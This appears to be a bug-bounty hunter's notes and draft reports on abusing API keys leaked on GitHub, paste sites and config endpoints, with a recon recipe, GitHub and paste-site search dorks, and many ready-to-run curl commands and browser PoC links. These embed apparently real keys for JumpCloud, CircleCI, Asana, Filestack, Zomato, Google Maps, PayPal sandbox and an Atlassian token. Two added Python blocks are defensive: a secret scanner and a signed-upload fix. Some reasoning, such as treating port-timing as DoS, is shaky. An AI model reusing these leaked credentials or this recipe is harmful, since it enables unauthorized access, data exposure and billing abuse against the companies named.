APIExploits

notes by aditya shende

Github Recon: keys, tokens, access keys etc.

What can you do with keys?

1. Read API docs
2. Look for key exchange code: curl, python, bash
IMP: curl
3. API docs: keywords (Secret_auth_token)
4. Exchange keys

IMP

1. Secret key - access key = no exploit
2. If no API docs = no exploit, no bug
3. Key should have some priv = info disclosure, or an action: delete, revoke, upload etc.

https://github.com/streaak/keyhacks

8819ada3791d0ee0e1d71587ff321253a5401a3a

1. curl -X GET \
https://console.jumpcloud.com/api/organizations/ \
-H 'Accept: application/json' \
-H 'Content-Type: application/json' \
-H 'x-api-key: 8819ada3791d0ee0e1d71587ff321253a5401a3a'

2. curl -X GET https://console.jumpcloud.com/api/applications \
-H 'Accept: application/json' \
-H 'Content-Type: application/json' \
-H 'x-api-key: 8819ada3791d0ee0e1d71587ff321253a5401a3a'

3. curl -H "x-api-key: 8819ada3791d0ee0e1d71587ff321253a5401a3a" "https://console.jumpcloud.com/api/systems"

4. curl -H "x-api-key: 8819ada3791d0ee0e1d71587ff321253a5401a3a" "https://console.jumpcloud.com/api/systemusers"

5. curl -H "x-api-key: 8819ada3791d0ee0e1d71587ff321253a5401a3a" "https://console.jumpcloud.com/api/applications"

site:pastebin.com | site:paste2.org | site:pastehtml.com | site:slexy.org |
site:snipplr.com | site:snipt.net | site:textsnip.com | site:bitpaste.app |
site:justpaste.it | site:heypasteit.com | site:hastebin.com | site:dpaste.org |
site:dpaste.com | site:codepad.org | site:jsitor.com | site:codepen.io |
site:jsfiddle.net | site:dotnetfiddle.net | site:phpfiddle.org |
site:ide.geeksforgeeks.org | site:repl.it | site:ideone.com | site:paste.debian.net |
site:paste.org | site:paste.org.ru | site:codebeautify.org | site:codeshare.io |
site:trello.com "circletoken"

25b7d2f03ad0a5c9cf2a2f4740211aaf3c4d59af

curl https://circleci.com/api/v1.1/me?circle-token=25b7d2f03ad0a5c9cf2a2f4740211aaf3c4d59af

curl --request GET \
--url https://circleci.com/api/v2/me \
--header 'authorization: 25b7d2f03ad0a5c9cf2a2f4740211aaf3c4d59af'

Steps:

1. Github, source code, JS files etc.
2. Any token, API key
3. Look for API docs
4. Look for curl request
5. Exchange keys
6. Exploit done

https://app.swaggerhub.com/apis-docs/Vivek-Raj/zomato-api/1.0.0#/Restaurant%20Reviews/get_reviews

Zomato : 399720f6f904f106e162cd2bd0011a6f

Process

1. Github: "jumpcloud.com" api key
2. Got API key
3. Look for API docs: jumpcloud api docs curl
4. Look for: curl request
5. Exchange / replace the key in the command
6. Run it from CMD / Ubuntu: exploit done

Exploits

Third party: Zomato, Google Maps API, Wordpress
Company service: Uber API
Detection: key name, service name
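Added example, not code from these notes or from any of the vendors named here: a small scanner that applies the "detection by key name and service name" idea above to a constructed .env file and JS bundle fragment, using the token shapes that appear in these notes. The regexes, lengths and sample values are assumptions taken from the samples in the notes, not from vendor documentation.

```python
import re
from typing import Dict, List

# Token shapes taken from the samples in these notes (lengths observed there,
# not from vendor documentation, so treat them as assumptions).
PATTERNS: Dict[str, re.Pattern] = {
    "google_api_key":   re.compile(r"\bAIza[0-9A-Za-z_-]{35}"),
    "weglot_api_key":   re.compile(r"\bwg_[0-9a-f]{30,40}\b"),
    "bunq_sandbox_key": re.compile(r"\bsandbox_[0-9a-f]{40,64}\b"),
    "filepicker_key":   re.compile(r'filepicker_key"?\s*:\s*"([A-Za-z0-9]{22})"'),
    "circleci_token":   re.compile(r"circle-?token=([0-9a-f]{40})\b"),
    "jumpcloud_header": re.compile(r"x-api-key:\s*([0-9a-f]{40})\b", re.I),
}
# Catch-all for named assignments (API_KEY=..., api_key: '...') in .env and JS files.
GENERIC = re.compile(
    r"(?i)\b([a-z0-9_.-]*(?:secret|api[_-]?key|auth[_-]?token|access[_-]?key)[a-z0-9_.-]*)"
    r"\s*[:=]\s*['\"]?([A-Za-z0-9_/+.-]{20,})"
)


def scan(text: str) -> List[Dict[str, object]]:
    """Scan text line by line. Vendor patterns run before GENERIC so that a value
    matched by both is reported once, under the more specific name."""
    findings: List[Dict[str, object]] = []
    seen = set()
    for lineno, line in enumerate(text.splitlines(), 1):
        hits = [(kind, m.group(1) if m.groups() else m.group(0))
                for kind, rx in PATTERNS.items() for m in rx.finditer(line)]
        hits += [("generic:" + m.group(1), m.group(2)) for m in GENERIC.finditer(line)]
        for kind, secret in hits:
            if (lineno, secret) not in seen:
                seen.add((lineno, secret))
                findings.append({"line": lineno, "kind": kind, "secret": secret})
    return findings


def redact(secret: str) -> str:
    """Keep enough to identify the credential in a ticket without reproducing it."""
    return secret[:4] + "..." + secret[-4:] if len(secret) > 12 else "***"


def report(text: str) -> List[str]:
    """One line per finding. Any hit means the credential is already compromised and
    must be rotated, whatever privilege it turns out to carry."""
    return [f"line {f['line']}: {f['kind']} -> {redact(f['secret'])}" for f in scan(text)]


# Constructed sample input: a committed .env and a JS bundle fragment. Every value
# is made up and built to the lengths the patterns expect.
SAMPLE = "\n".join([
    "# .env committed by mistake",
    "JUMPCLOUD_API_KEY=" + "0123456789abcdef" * 2 + "01234567",
    "DB_HOST=localhost",
    "// app.bundle.js",
    "Weglot.initialize({ api_key: 'wg_" + "1234567890abcdef" * 2 + "1' });",
    "var mapsUrl = 'https://maps.example/json?key=AIza" + "SyEXAMPLEKEY" + "0" * 23 + "';",
    '{"filepicker_conversion_url":"https://process.fs.example","filepicker_key":"AbCdEfGhIjKlMnOpQrStUv"}',
])

if __name__ == "__main__":
    for line in report(SAMPLE):
        print(line)
```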

BASE URL: curl -H "Authorization: 0/ca581dda1b807b654e09b05bd8a8c70" https://app.asana.com/api/1.0/users/me

Weglot.initialize({
api_key: 'wg_3fa15532f2f69c44a683790307a57b3c7'
});

curl -X POST \
'https://api.weglot.com/translate?api_key=wg_3fa15532f2f69c44a683790307a57b3c7' \
-H 'Content-Type: application/json' \
-d '{
"l_from":"en",
"l_to":"fr",
"request_url":"https://www.re-cap.com/",
"words":[
{"w":"This is a blue car", "t": 1},
{"w":"This is a black car", "t": 1}
]
}'

curl https://app.asana.com/api/1.0/users/me \
-H "Authorization: Bearer 0/ca581dda1b807b654e09b05bd8a8c70"

"filepicker_conversion_url":"https://process.fs.grailed.com","filepicker_key":"AJdAgnqCST4iPtnUxiGtTz"

curl -X POST \
-d url="https://upload.wikimedia.org/wikipedia/commons/thumb/4/47/PNG_transparency_demonstration_1.png/420px-PNG_transparency_demonstration_1.png" \
"https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"

curl -X POST --data-binary @test.txt --header "Content-Type: text/plain" "https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"
google query:

grailed.com api docs curl
paytm api docs curl
segment api docs curl
paypal api docs curl

curl --request GET \
--url https://apidojo-hm-hennes-mauritz-v1.p.rapidapi.com/regions/list \
--header 'X-RapidAPI-Host: apidojo-hm-hennes-mauritz-v1.p.rapidapi.com' \
--header 'X-RapidAPI-Key: 7e06e2fe93msh93a651f74b7e29fp17c6e7jsna95be08dc858'

token : E4gg1bkY8HgPXVFuqOeQMXppxgdfJglTkYaez4tLVUnVBeRsgTpVBK9ngxGdqp7

curl -v -X GET "https://api-m.sandbox.paypal.com/v1/invoicing/invoices?page=3&page_size=4&total_count_required=true" \
-H "Content-Type: application/json" \
-H "Authorization: E4gg1bkY8HgPXVFuqOeQMXppxgdfJglTkYaez4tLVUnVBeRsgTpVBK9ngxGdqp7"

curl -u KEY:SECRET 'https://amplitude.com/api/2/events/segmentation?e={"event_type":"_active"}&start=20170301&end=20170321'

curl --header "X-Zomato-API-Key:7749b19667964b87a3efc739e254ada2" "https://api.zomato.com/v1/search.json?city_id=1"

curl -X GET --header "Accept: application/json" --header "user-key:" "https://developers.zomato.com/api/v2.1/restaurant?res_id=ccd"

curl -X GET --header "Accept: application/json" --header "user-key: 6aebfe02b9c7820ae965ccf5769fea39" "https://developers.zomato.com/api/v2.1/restaurant?res_id=1"

1. Look for key name or service name
2. Look for target api docs curl
3. Look for curl command and exchange keys
4. Gather data or exploit

curl -X POST \
-d url="https://events.eurid.eu/media/upload/tedex_2012-2790.jpg" \
"https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"

API key exploit led to blind SSRF, EXIF issue, third-party image upload

Hi team,

Aditya here, found an information disclosure bug. Please look into it

Description: Disclosed API key to list user information

Developers are increasingly relying on cloud-based tools to automate building code and deployment of services, which is leading to far more instances of accidental public exposure of sensitive data.

There are a lot of things that hackers can do with a developer’s cloud
credentials: spin up hundreds of servers, take down servers, “redistribute” DNS and
load balancers, and much more. Accidental public exposure of credentials such as
API keys, OAuth tokens, and app secrets is a mistake that can be made by both
inexperienced and seasoned developers, particularly when it comes to source
control. Right now there are thousands of exposed API keys on GitHub that can be
found in just minutes using GitHub code search; these can be found in seconds by
bots.

Consider Your Data Compromised When You Push a Commit

When it comes to accidental exposure of API keys and other sensitive data on GitHub, GitHub states very clearly on the advanced Git help page that “once you have pushed a commit to GitHub, you should consider any data it contains to be compromised. If you committed a password, change it! If you committed a key, generate a new one.” GitHub provides detailed instructions on how to purge a file from a GitHub repository’s history.

Key Found URL:

https://github.com/tggrsmth/jumpcloudapp/blob/35cc63f0fcd874ffd0dde0d1194c891da78b5981/.env

Exploit:

curl -H "x-api-key: 0158cfa7ab5d88a2a09e3963228da6ecb9a0ffa7" "https://console.jumpcloud.com/api/systems"

curl -L -X POST 'https://amplitude.com/api/2/lookup_table/:name' \
-u API_KEY:SECRET_KEY \
-F 'file=@"/path/to/file.csv"'

399720f6f904f106e162cd2bd0011a6f

curl --location --request GET 'https://developers.zomato.com/api/v2.1/categories' \
--header 'user-key: 399720f6f904f106e162cd2bd0011a6f'

curl --location --request GET 'https://developers.zomato.com/api/v2.1/cities?q=pune&lat=-77596659.4184915&lon=-77596659.4184915&city_ids=*&count=56625527' \
--header 'user-key: 399720f6f904f106e162cd2bd0011a6f'

curl --location --request GET 'https://developers.zomato.com/api/v2.1/cuisines?lat=-77596659.4184915&lon=-77596659.4184915&city_id=*' \
--header 'user-key: 399720f6f904f106e162cd2bd0011a6f'

1. "zomato.com" api key
2. zomato api docs curl
3. curl
4. exchange keys

Steps:

1. Search API docs: grailed api docs curl, filepicker api docs curl

Exploit
Upload any image
EXIF metadata not stripped

curl -X GET "https://www.filestackapi.com/api/file/vVHvaeQTTNKeJybLFdQN/metadata"

https://cdn.fs.grailed.com/vVHvaeQTTNKeJybLFdQN

curl -X POST \
-d url="https://w0xbntim85vtgvu72su9hdji49azyo.burpcollaborator.net/aditya.png" \
"https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"

"filepicker_conversion_url":"https://process.fs.grailed.com","filepicker_key":"AJdAgnqCST4iPtnUxiGtTz"

site:documenter.getpostman.com inurl:"walmart"

curl --location --request GET 'https://developers.zomato.com/api/v2.1/categories' \
--header 'user-key: 46327a3a1c3db149805d3ba2cf8a4abb'

curl --location --request GET 'https://developers.zomato.com/api/v2.1/restaurant?res_id=56625527' \
--header 'user-key: 46327a3a1c3db149805d3ba2cf8a4abb'

Hello Team,

I, Aditya Shende, found a critical vulnerability; I hope you remember me ;).

Title: API config endpoint disclosed sensitive key which leads to unauthorised file
upload in grailed domain.

Description:
“APIs tend to expose endpoints that handle object identifiers, creating a wide attack surface Level Access Control issue. Object-level authorization checks should be considered in every function that accesses a data source using an input from the user.” - OWASP
Since APIs enable access to objects, if authorization is broken there is a wide attack area. Thus, authorization to API-accessible objects must be secured.

Solution: Use an API gateway and implement object-level authorization checks. Require access tokens to permit access, and only allow access to those with the proper authorization credentials.

Steps:
1. Visit grailed.com/api/config
2. Search for: "key" and "url" keyword (remove quotes)
Info found:
filepicker_key":"AJdAgnqCST4iPtnUxiGtTz

https://process.fs.grailed.com

Exploit:
curl -X POST \
-d url="https://www.3cx.com/wp-content/uploads/2020/08/3-signs-been-hacked.jpg" \
"https://process.fs.grailed.com/api/store/S3?key=AJdAgnqCST4iPtnUxiGtTz"

In this I fetched a file from another website to upload it.

Using this, any attacker or bad person can upload a file to your website, which may lead to profile impersonation or reputation issues.
There are multiple attacks we can perform using keys, but I chose file upload and this bug is really CRITICAL, so patch it ASAP

POC attached;
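The "require access tokens" fix proposed in the report above, as an added example that is not grailed's or Filestack's code: the upload endpoint keeps the public app key as an identifier only and additionally demands a server-minted, HMAC-signed policy that expires and names the calls it permits, so a key copied out of a config endpoint is no longer enough to upload. The policy/signature shape mirrors the one Filestack's security feature uses, but every name, secret and value here is an assumption constructed for the example.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import List, Optional, Tuple

# Constructed secret for the example; in practice it never leaves the server.
APP_SECRET = b"example-app-secret-not-a-real-value"


def _b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).decode().rstrip("=")


def _unb64url(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_policy(secret: bytes, calls: List[str], ttl_seconds: int,
                now: Optional[int] = None) -> Tuple[str, str]:
    """Server side: mint a short-lived policy allowing only `calls` (for example
    ["store"]) and sign it with HMAC-SHA256. Returns (policy_b64, signature_hex)."""
    now = int(time.time()) if now is None else now
    policy = {"expiry": now + ttl_seconds, "call": calls}
    policy_b64 = _b64url(json.dumps(policy, separators=(",", ":")).encode())
    signature = hmac.new(secret, policy_b64.encode(), hashlib.sha256).hexdigest()
    return policy_b64, signature


def verify_policy(secret: bytes, policy_b64: str, signature_hex: str, call: str,
                  now: Optional[int] = None) -> Tuple[bool, str]:
    """Endpoint side: accept only an authentic, unexpired policy that permits `call`.
    The signature is checked before the policy is parsed, so tampered input is
    rejected without ever being interpreted."""
    now = int(time.time()) if now is None else now
    if not policy_b64 or not signature_hex:
        return False, "missing policy or signature"
    expected = hmac.new(secret, policy_b64.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected.encode(), signature_hex.encode()):
        return False, "bad signature"
    try:
        policy = json.loads(_unb64url(policy_b64))
    except ValueError:  # covers binascii.Error and JSONDecodeError
        return False, "malformed policy"
    if not isinstance(policy, dict):
        return False, "malformed policy"
    if now >= int(policy.get("expiry", 0)):
        return False, "expired"
    if call not in policy.get("call", []):
        return False, "call not permitted"
    return True, "ok"


def handle_store_request(params: dict, now: Optional[int] = None) -> Tuple[bool, str]:
    """Models the /api/store/S3?key=... endpoint after the fix: the public key still
    identifies the app, but the call is authorized by the signed policy alone."""
    if not params.get("key"):
        return False, "missing app key"
    return verify_policy(APP_SECRET, params.get("policy", ""),
                         params.get("signature", ""), "store", now)


if __name__ == "__main__":
    policy, sig = make_policy(APP_SECRET, ["store"], ttl_seconds=300)
    print(handle_store_request({"key": "APPKEY"}))                                    # key alone: rejected
    print(handle_store_request({"key": "APPKEY", "policy": policy, "signature": sig}))  # (True, 'ok')
```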

================

Hello team,

Aditya here, I found keys in one of your domains which is vulnerable.

Description: An attacker can exploit the exposure of your API key by making
requests to the Google Maps API that appear to be coming from your app. A group of
malicious users could spam the API to use up your app's "courtesy" bandwidth, or to
run up your bandwidth bill if you have billing enabled for the Google Maps API. If
you (or Google) are keeping a close eye on your bandwidth usage, you could
partially defend against such an attack by revoking and replacing the maps API key
when your app's (apparent) usage of the maps API spikes.

Exploits:

API key is vulnerable for Place Details API! Here is the PoC link which can be used directly via browser:
https://maps.googleapis.com/maps/api/place/details/json?place_id=ChIJN1t_tDeuEmsRUsoyG83frY4&fields=name,rating,formatted_phone_number&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ

API key is vulnerable for Nearby Search-Places API! Here is the PoC link which can be used directly via browser:
https://maps.googleapis.com/maps/api/place/nearbysearch/json?location=-33.8670522,151.1957362&radius=100&types=food&name=harbour&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ

API key is vulnerable for Text Search-Places API! Here is the PoC link which can be used directly via browser:
https://maps.googleapis.com/maps/api/place/textsearch/json?query=restaurants+in+Sydney&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ

API key is vulnerable for Places Photo API! Here is the PoC link which can be used directly via browser:
https://maps.googleapis.com/maps/api/place/photo?maxwidth=400&photoreference=CnRtAAAATLZNl354RwP_9UKbQ_5Psy40texXePv4oAlgP4qNEkdIrkyse7rPXYGd9D_Uj1rVsQdWT4oRz4QrYAJNpFX7rzqqMlZw2h2E2y5IKMUZ7ouD_SlcHxYq1yL4KbKUv3qtWgTK0A6QbGh87GB3sscrHRIQiG2RrmU_jF4tENr9wGS_YxoUSSDrYjWmrNfeEHSGSc3FyhNLlBU&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ

API key is vulnerable for Directions API! Here is the PoC link which can be used directly via browser:
https://maps.googleapis.com/maps/api/directions/json?origin=Disneyland&destination=Universal+Studios+Hollywood4&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ

API key is vulnerable for Geocode API! Here is the PoC link which can be used directly via browser:
https://maps.googleapis.com/maps/api/geocode/json?latlng=40,30&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ

API key is vulnerable for Distance Matrix API! Here is the PoC link which can be used directly via browser:
https://maps.googleapis.com/maps/api/distancematrix/json?units=imperial&origins=40.6655101,-73.89188969999998&destinations=40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.6905615%2C-73.9976592%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626%7C40.659569%2C-73.933783%7C40.729029%2C-73.851524%7C40.6860072%2C-73.6334271%7C40.598566%2C-73.7527626&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ

API key is vulnerable for Find Place From Text API! Here is the PoC link which can be used directly via browser:
https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=Museum%20of%20Contemporary%20Art%20Australia&inputtype=textquery&fields=photos,formatted_address,name,rating,opening_hours,geometry&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ

API key is vulnerable for Autocomplete API! Here is the PoC link which can be used directly via browser:
https://maps.googleapis.com/maps/api/place/autocomplete/json?input=Bingh&types=%28cities%29&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ

API key is vulnerable for Elevation API! Here is the PoC link which can be used directly via browser:
https://maps.googleapis.com/maps/api/elevation/json?locations=39.7391536,-104.9847034&key=AIzaSyAcK69n1PuaZfk7MFnUiUjiwbIllj6V6JQ

Impact
costing companies extra money and in some cases DoS.
Identified cost: $5 per 1000 requests

POC:

===============================================
Hello team,

Aditya here, found a security issue where I got some endpoints and got an API key in the response while exploiting

URL: https://public-api.sandbox.bunq.com/v1/sandbox-user

Exploit:
curl https://public-api.sandbox.bunq.com/v1/sandbox-user -X POST --header "Content-Type: application/json" --header "Cache-Control: none" --header "User-Agent: curl-request" --header "X-Bunq-Client-Request-Id: $(date)randomId" --header "X-Bunq-Language: nl_NL" --header "X-Bunq-Region: nl_NL" --header "X-Bunq-Geolocation: 0 0 0 0 000"

Response: {"Response":[{"ApiKey":{"api_key":"sandbox_3ddd71f6415f3cb9f6d8fb30e3ad14fc6f0706aeaa7409f1e1e99474"}}]}

1. API docs
2. curl request
3. Exchange URLs and keys
4. CMD or Ubuntu = exploit

IMP
1. Check for API endpoint priv
2. Think out of the box

cat sub.txt | waybackurls | grep '\.js'


Summary: Atlassian token disclosure and crafting nested queries with internal port scan as SSRF may lead to application-level DoS

Steps to reproduce:
1. Use this in cmd: curl -v https://onduo.com --user [email protected]:2f62f85b-0b5e-4ea0-baf8-a57f8fb4f9a3_527e5684de2592899d0da0846645f0121f031459_lout

2. I got this token from burpsuite spidering of onduo.atlassian.net

3. Now run this: curl -v https://onduo.com:22 --user [email protected]:2f62f85b-0b5e-4ea0-baf8-a57f8fb4f9a3_527e5684de2592899d0da0846645f0121f031459_lout

We can see the time delay on port change: 80 and 8080 give an instant response but port 22 gives a late response

Browser/OS: NA/ Firefox

Attack scenario:
A successful SSRF attack can often result in unauthorized actions or access to data
within the organization, either in the vulnerable application itself or on other
back-end systems that the application can communicate with. In some situations, the
SSRF vulnerability might allow an attacker to perform arbitrary command execution.

An SSRF exploit that causes connections to external third-party systems might result in malicious onward attacks that appear to originate from the organization hosting the vulnerable application, leading to potential legal liabilities and reputational damage.

When we check the command on ports 80 and 8080 it gives a speedy response but on port 22 it gives a late response. It means 22 is closed. If a hacker performs this attack like a port scan then this may lead to DoS

POC: https://drive.google.com/file/d/1jXxCH80e9EwGjHWMGC716iB1Z6l4_xsw/view?usp=sharing

Hello team,

As I mentioned in the 2nd step, I got the token while crawling the whole web app; the simpler method is to check the source code of the following endpoint:
https://onduollc.atlassian.net/projects

Steps to reproduce issue:

1. Check source code of https://onduollc.atlassian.net/projects
2. Search for "atlassian-token"
3. Atlassian token can be used for crafting nested queries but I escalated this to SSRF port scan
4. Syntax for crafting nested queries: curl -v https://mainhost.com --user [email protected]:atlassian_token_here_lout
Exploit command:
1. On port 80
curl -v https://onduo.com:80 --user [email protected]:2f62f85b-0b5e-4ea0-baf8-a57f8fb4f9a3_527e5684de2592899d0da0846645f0121f031459_lout

It crafted queries and gave us a valid, instant response
image.png

2. On port 22
curl -v https://onduo.com:22 --user [email protected]:2f62f85b-0b5e-4ea0-baf8-a57f8fb4f9a3_527e5684de2592899d0da0846645f0121f031459_lout
It gave me a response after 1 min 45 seconds: "failed to connect on port 22"
image.png

3. On port 443
curl -v https://onduo.com:443 --user [email protected]:2f62f85b-0b5e-4ea0-baf8-a57f8fb4f9a3_527e5684de2592899d0da0846645f0121f031459_lout
It gave me an instant response with crafted queries

PORT443.gif

An interesting part is when I change the host on the port which we check

Command is curl -v https://enroll.onduo.com:443 --user [email protected]:2f62f85b-0b5e-4ea0-baf8-a57f8fb4f9a3_527e5684de2592899d0da0846645f0121f031459_lout

it gave me the following information:

__FIREBASE_API_KEY__ = 'AIzaSyCq7ZPizDqVfo0D8y8fTfHIDqJ5Qq7FvFc';
__FIREBASE_PROJECT_ID__ = 'diabetes-management';
__FIREBASE_AUTH_DOMAIN__ = 'diabetes-management.firebaseapp.com';
__FIREBASE_DATABASE_URL__ = 'https:\/\/fanyv88.com:443\/https\/diabetes-management.firebaseio.com';
__FIREBASE_STORAGE_BUCKET__ = 'diabetes-management.appspot.com';
__FIREBASE_MESSAGING_SENDER_ID__ = '719737211384'

Also I tried the same command with port 3306 and it takes a long time

Impact: The first part is, it gives an instant response on an open port and when I try with a closed port like 3306 or 22 it takes long to craft queries

So if a hacker tries the same attacks on closed ports, the command will force the server to craft queries; because of a closed port it's not going to craft it. Performing the same attack on closed ports to craft queries will make the server engage and this may lead to a DoS attack.

Changing the host to enroll.onduo.com with port 443 to perform SSRF was giving sensitive information about firebase stuff

If you've any queries feel free to ask

TASK:
grailed.com | key | exploit
